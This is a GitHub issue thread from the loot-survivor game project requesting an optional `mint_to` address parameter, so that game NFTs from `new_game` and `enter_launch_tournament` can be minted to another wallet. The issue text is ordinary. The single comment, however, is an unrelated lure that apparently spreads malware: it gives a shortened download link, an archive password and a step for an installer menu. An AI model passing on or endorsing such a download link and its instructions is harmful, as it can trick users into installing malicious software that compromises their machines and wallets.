### ISSUE TITLE
add a mint_to parameter to enter_launch_tournament and new_game

### ISSUE THREAD

**Issue by loothero** [Provable-Games/loot-survivor#198]
To enable someone to start a new game (or enter launch tournament) but send the game NFTs to a different wallet, we need to provide support for an optional `mint_to: ContractAddress` in both of these external functions.

If a `mint_to` address is provided, the contract will mint the game NFT to that address.
If zero is provided, the contract will mint the game NFT to the caller address

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
